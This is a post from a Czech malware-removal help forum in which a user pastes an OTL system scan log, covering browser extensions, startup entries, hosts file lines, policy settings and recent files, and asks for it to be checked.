FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\eplgTb@eset.com: C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird [2013.04.23 15:43:57 | 000,000,000 | ---D | M]

[2013.04.19 14:50:49 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Lobo\AppData\Roaming\Mozilla\Extensions
[2014.12.05 17:54:18 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Lobo\AppData\Roaming\Mozilla\Firefox\Profiles\fa980s6u.default\extensions
[2012.08.24 12:47:32 | 000,005,054 | ---- | M] () (No name found) -- C:\Users\Lobo\AppData\Roaming\Mozilla\Firefox\Profiles\fa980s6u.default\extensions\QipCounter@qip.ru.xpi
[2014.06.29 18:47:18 | 000,201,488 | ---- | M] () (No name found) -- C:\Users\Lobo\AppData\Roaming\Mozilla\Firefox\Profiles\fa980s6u.default\extensions\{0d45f140-f048-43a8-8755-71bde9e9f4e6}.xpi
[2013.04.19 16:30:02 | 000,002,062 | ---- | M] () -- C:\Users\Lobo\AppData\Roaming\Mozilla\Firefox\Profiles\fa980s6u.default\searchplugins\qip-search.xml
[2014.11.11 00:49:23 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014.11.11 00:49:31 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2014.12.09 13:44:26 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\updated\browser\extensions
[2014.12.09 13:44:37 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\updated\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
Nahoru
chvostik
Návštěvník
Návštěvník
Příspěvky: 31
Registrován: 04 dub 2008 17:37

Re: Malware - prosim o kontrolu logu

#5 Příspěvek od chvostik »

========== Chrome ==========

CHR - default_search_provider: (Enabled)
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url =
CHR - homepage: http://mysearch.avg.com?cid={6D884549-F ... 2014-05-19 20:03:06&v=18.1.0.443&pid=safeguard&sg=&sap=hp
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\pdf.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files (x86)\Google\Update\1.3.21.153\npGoogleUpdate3.dll
CHR - plugin: Java(TM) Platform SE 7 U21 (Enabled) = C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
CHR - plugin: NVIDIA 3D Vision (Enabled) = C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll
CHR - plugin: NVIDIA 3D VISION (Enabled) = C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll
CHR - plugin: Pando Web Plugin (Enabled) = C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_8_800_168.dll
CHR - plugin: Java Deployment Toolkit 7.0.210.11 (Enabled) = C:\Windows\SysWOW64\npDeployJava1.dll
CHR - Extension: Dokumenty Google = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\
CHR - Extension: Disk Google = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: Validity = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbicmjjbohdfglopkidebfccilipgeif\130\
CHR - Extension: YouTube = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Vyhledávání Google = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: No name found = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpfhbllmiipcmgbdlmehpipicmijimke\3.9\
CHR - Extension: Peněženka Google = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\

O1 HOSTS File: ([2014.02.25 16:32:46 | 000,000,923 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 genuine.microsoft.com
O1 - Hosts: 127.0.0.1 mpa.one.microsoft.com
O1 - Hosts: 127.0.0.1 sls.microsoft.com
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (QIPBHO Class) - {95289393-33EA-4F8D-B952-483415B9C955} - C:\Users\Lobo\AppData\Roaming\Microsoft\Internet Explorer\qipsearchbar.dll (qip.ru)
O2 - BHO: (no name) - {95B7759C-8C7F-4BF1-B163-73684A933233} - No CLSID value found.
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4:64bit: - HKLM..\Run: [egui] C:\Program Files\ESET\ESET Smart Security\egui.exe (ESET)
O4:64bit: - HKLM..\Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [] File not found
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [ZoneAlarm] C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe (Check Point Software Technologies Ltd.)
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-2861910011-920187971-3878467655-1000..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
O4 - HKU\S-1-5-21-2861910011-920187971-3878467655-1000..\Run: [GoogleDriveSync] C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google)
O4 - HKU\S-1-5-21-2861910011-920187971-3878467655-1001..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-21-2861910011-920187971-3878467655-1001..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O7 - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoLogoff = 0
O7 - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoClose = 0
O7 - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableLockWorkstation = 0
O7 - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableChangePassword = 0
O8:64bit: - Extra context menu item: Download with GetRight - C:\Program Files (x86)\GetRight\GRDownload.htm ()
O8:64bit: - Extra context menu item: Open with GetRight Browser - C:\Program Files (x86)\GetRight\GRBrowse.htm ()
O8 - Extra context menu item: Download with GetRight - C:\Program Files (x86)\GetRight\GRDownload.htm ()
O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files (x86)\GetRight\GRBrowse.htm ()
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 10.10.10.1 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{2EFE5CB0-CB8F-49F6-93A4-AA75FEB7B609}: DhcpNameServer = 10.10.10.1 192.168.1.254
O18:64bit: - Protocol\Handler\msdaipp - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\oledb - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\ms-itss - No CLSID value found
O18:64bit: - Protocol\Handler\mso-offdap11 - No CLSID value found
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18:64bit: - Protocol\Filter\text/xml - No CLSID value found
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2014.12.09 13:42:19 | 000,086,842 | ---- | M] () - C:\autoupdate.log -- [ NTFS ]
O32 - AutoRun File - [2007.08.08 14:14:09 | 000,000,000 | ---- | M] () - F:\AUTOEXEC.BAT -- [ NTFS ]
O32 - AutoRun File - [2009.07.14 18:48:15 | 000,000,122 | R--- | M] () - G:\autorun.inf -- [ UDF ]
O32 - AutoRun File - [2007.11.08 06:44:04 | 000,054,272 | R--- | M] (Microsoft Corporation) - H:\autorun.exe -- [ UDF ]
O32 - AutoRun File - [2003.07.24 02:26:21 | 000,000,048 | R--- | M] () - H:\autorun.inf -- [ UDF ]
O33 - MountPoints2\{04677141-a8f2-11e2-9a94-806e6f6e6963}\Shell - "" = AutoRun
O33 - MountPoints2\{04677141-a8f2-11e2-9a94-806e6f6e6963}\Shell\AutoRun\command - "" = G:\setup.exe -- [2009.07.14 18:48:15 | 000,106,760 | R--- | M] (Microsoft Corporation)
O33 - MountPoints2\{36bebec4-ae49-11e2-b84f-1c6f65ae4f4a}\Shell - "" = AutoRun
O33 - MountPoints2\{36bebec4-ae49-11e2-b84f-1c6f65ae4f4a}\Shell\AutoRun\command - "" = H:\autorun.exe -- [2007.11.08 06:44:04 | 000,054,272 | R--- | M] (Microsoft Corporation)
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

NetSvcs:64bit: AppMgmt - C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation)

Drivers32:64bit: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32:64bit: VIDC.FPS1 - frapsv64.dll (Beepa P/L)
Drivers32: msacm.l3acm - C:\Windows\SysWOW64\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: vidc.cvid - C:\Windows\SysWow64\iccvid.dll (Radius Inc.)
Drivers32: VIDC.FMVC - C:\Windows\SysWow64\fmcodec.DLL (Fox Magic Software)
Drivers32: VIDC.FPS1 - C:\Windows\SysWow64\frapsvid.dll (Beepa P/L)
PhysicalDisk0 MBR saved to C:\PhysicalMBR.bin

========== Files/Folders - Created Within 7 Days ==========

[2014.12.09 17:30:53 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Lobo\Desktop\OTL.exe
[2014.12.09 16:36:56 | 000,000,000 | ---D | C] -- C:\Program Files\trend micro
[2014.12.09 16:36:55 | 000,000,000 | ---D | C] -- C:\rsit
[2014.12.09 08:41:36 | 007,717,984 | ---- | C] (Kaspersky Lab ZAO) -- C:\Windows\SysNative\drivers\kl1.sys
[2014.12.09 08:41:34 | 000,490,592 | ---- | C] (Kaspersky Lab ZAO) -- C:\Windows\SysNative\drivers\klif.sys
[2014.12.09 08:41:34 | 000,092,768 | ---- | C] (Kaspersky Lab ZAO) -- C:\Windows\SysNative\drivers\klflt.sys
[2014.12.09 08:41:34 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\DRVSTORE
[2014.12.09 08:12:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Check Point
[2014.12.09 08:11:58 | 000,374,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\netio.sys
[2014.12.09 07:50:59 | 000,129,752 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014.12.09 07:50:40 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
[2014.12.09 07:50:37 | 000,093,400 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014.12.09 07:50:37 | 000,063,704 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mwac.sys
[2014.12.09 07:50:37 | 000,025,816 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys
[2014.12.09 07:50:37 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes Anti-Malware
[2014.12.09 07:50:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2014.12.08 23:30:06 | 000,000,000 | ---D | C] -- C:\1470d06be47cb175c79779ff1f
[2014.12.08 11:39:47 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft ASP.NET
[2014.12.07 21:13:51 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MySQL
[2014.12.07 21:13:51 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\MySQL
[2014.12.07 12:42:04 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft SDKs
[2014.12.07 12:41:12 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2008
[2014.12.07 12:40:29 | 000,000,000 | ---D | C] -- C:\ProgramData\PreEmptive Solutions
[2014.12.06 16:39:55 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\CE Remote Tools
[2014.12.06 16:39:51 | 000,000,000 | -HSD | C] -- C:\Config.Msi
[2014.12.06 16:39:02 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft Web Designer Tools
[2014.12.06 16:38:50 | 000,000,000 | RH-D | C] -- C:\MSOCache
[2014.12.06 10:37:25 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Check Point Software Technologies LTD
[2014.12.06 10:36:53 | 000,000,000 | ---D | C] -- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD
[2014.12.06 10:36:49 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\CheckPoint
[2014.12.06 10:34:43 | 000,000,000 | ---D | C] -- C:\ProgramData\CheckPoint
[2 C:\Users\Lobo\Documents\*.tmp files -> C:\Users\Lobo\Documents\*.tmp -> ]
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files - Modified Within 7 Days ==========

[2014.12.09 17:36:27 | 000,000,512 | ---- | M] () -- C:\PhysicalMBR.bin
[2014.12.09 17:30:53 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Lobo\Desktop\OTL.exe
[2014.12.09 17:14:02 | 000,000,914 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014.12.09 17:13:50 | 000,052,432 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014.12.09 17:13:50 | 000,052,432 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014.12.09 17:05:59 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014.12.09 16:48:00 | 000,000,952 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA1cf6ab1eb08fd0f.job
[2014.12.09 13:47:42 | 000,724,398 | ---- | M] () -- C:\Windows\SysNative\perfh005.dat
[2014.12.09 13:47:42 | 000,709,964 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014.12.09 13:47:42 | 000,162,428 | ---- | M] () -- C:\Windows\SysNative\perfc005.dat
[2014.12.09 13:47:42 | 000,143,218 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014.12.09 13:47:41 | 001,741,822 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014.12.09 13:42:07 | 000,000,948 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore1cf8c5b584a0b82.job
[2014.12.09 13:41:34 | 000,025,640 | ---- | M] (Windows (R) Server 2003 DDK provider) -- C:\Windows\gdrv.sys
[2014.12.09 13:41:29 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014.12.09 13:41:28 | 3219,300,352 | -HS- | M] () -- C:\hiberfil.sys
[2014.12.09 08:37:24 | 000,000,000 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\lmhosts
[2014.12.09 08:12:26 | 000,431,395 | ---- | M] () -- C:\Windows\SysNative\drivers\vsconfig.xml
[2014.12.09 08:12:09 | 000,000,762 | ---- | M] () -- C:\Users\Public\Desktop\ZoneAlarm Security.lnk
[2014.12.09 07:51:53 | 000,001,102 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014.12.08 23:50:04 | 000,007,607 | ---- | M] () -- C:\Users\Lobo\AppData\Local\resmon.resmoncfg
[2014.12.07 21:13:55 | 001,765,988 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2014.12.07 21:06:35 | 000,368,112 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2 C:\Users\Lobo\Documents\*.tmp files -> C:\Users\Lobo\Documents\*.tmp -> ]
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files Created - No Company Name ==========

[2014.12.09 17:36:27 | 000,000,512 | ---- | C] () -- C:\PhysicalMBR.bin
[2014.12.09 08:12:15 | 000,431,395 | ---- | C] () -- C:\Windows\SysNative\drivers\vsconfig.xml
[2014.12.09 08:12:09 | 000,000,762 | ---- | C] () -- C:\Users\Public\Desktop\ZoneAlarm Security.lnk
[2014.12.09 07:50:41 | 000,001,102 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014.11.11 18:36:42 | 000,538,126 | --S- | C] () -- C:\Windows\SysWow64\libcurl-4.dll
[2014.11.11 18:36:42 | 000,192,512 | --S- | C] () -- C:\Windows\SysWow64\libidn-11.dll
[2014.11.11 18:36:42 | 000,133,632 | --S- | C] () -- C:\Windows\SysWow64\librtmp.dll
[2014.11.11 18:36:42 | 000,100,864 | --S- | C] () -- C:\Windows\SysWow64\zlib1.dll
[2014.11.03 20:01:53 | 000,000,016 | ---- | C] () -- C:\Windows\SysWow64\msvcsv60.dll
[2014.11.03 20:01:53 | 000,000,016 | ---- | C] () -- C:\Users\Lobo\AppData\Roaming\msregsvv.dll
[2014.11.03 20:01:53 | 000,000,016 | ---- | C] () -- C:\Windows\msocreg32.dat
[2014.11.03 20:01:53 | 000,000,016 | ---- | C] () -- C:\ProgramData\autobk.inc
[2014.10.17 19:40:30 | 000,002,135 | ---- | C] () -- C:\Users\Lobo\.recently-used.xbel
[2014.09.02 11:03:15 | 000,000,406 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014.04.28 20:12:05 | 000,004,096 | -H-- | C] () -- C:\Users\Lobo\AppData\Local\keyfile3.drm
[2014.04.24 16:58:22 | 000,003,584 | ---- | C] () -- C:\Users\Lobo\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2014.01.07 16:32:33 | 000,000,000 | ---- | C] () -- C:\Windows\aaLicView.INI
[2013.05.03 17:25:13 | 001,765,988 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013.04.20 20:20:53 | 000,000,528 | ---- | C] () -- C:\Windows\ODBC.INI
[2013.04.19 20:47:51 | 000,007,607 | ---- | C] () -- C:\Users\Lobo\AppData\Local\resmon.resmoncfg
[2013.04.19 14:59:05 | 000,178,688 | ---- | C] () -- C:\Windows\SysWow64\unrar.dll
[2013.04.19 14:29:14 | 000,030,528 | ---- | C] () -- C:\Windows\GVTDrv64.sys
[2013.04.19 14:15:37 | 000,000,010 | ---- | C] () -- C:\Windows\GSetup.ini

========== ZeroAccess Check ==========

[2009.07.14 05:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2009.07.14 02:41:54 | 014,161,920 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2009.07.14 02:16:14 | 012,866,560 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009.07.14 02:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009.07.14 02:15:20 | 000,605,696 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009.07.14 02:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

========== LOP Check ==========

[2014.10.22 17:33:04 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Audacity
[2014.04.02 10:28:32 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\AVG
[2014.01.17 13:39:39 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Battle.net
[2013.04.27 18:06:13 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\BSplayer
[2013.04.19 15:00:12 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\BSplayer Pro
[2014.12.06 10:37:14 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD
[2013.04.26 10:04:43 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\DAEMON Tools Lite
[2014.04.02 10:27:50 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\DVDVideoSoft
[2014.11.10 22:52:18 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\e-academy Inc
[2013.04.23 15:44:47 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\ESET
[2014.01.13 19:38:22 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\GetRight
[2014.10.06 10:22:09 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\GHISLER
[2014.09.23 09:18:11 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\gtk-2.0
[2014.11.03 20:02:03 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\IK Multimedia
[2014.05.15 17:04:37 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\PDF Architect
[2014.05.15 17:02:19 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\pdfforge
[2014.06.22 11:08:40 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Publish Providers
[2013.04.19 15:05:20 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\QIP
[2014.11.03 20:23:51 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\REAPER
[2013.07.05 22:29:22 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Riot Games
[2013.05.25 22:13:14 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Shifters Anticheat
[2013.06.17 20:23:56 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Softland
[2014.07.01 10:52:51 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Sony
[2014.06.24 16:05:17 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Sublime Text 3
[2014.11.26 22:35:10 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\TS3Client
[2014.01.13 19:34:53 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Unity
[2013.06.28 11:03:20 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\VitySoft

========== Purity Check ==========



========== Custom Scans ==========

< >
[2009.07.14 06:08:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2009.07.14 06:08:49 | 000,032,582 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2013.04.19 14:58:04 | 000,000,914 | ---- | C] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job
[2014.05.08 12:37:40 | 000,000,952 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cf6ab1eb08fd0f.job
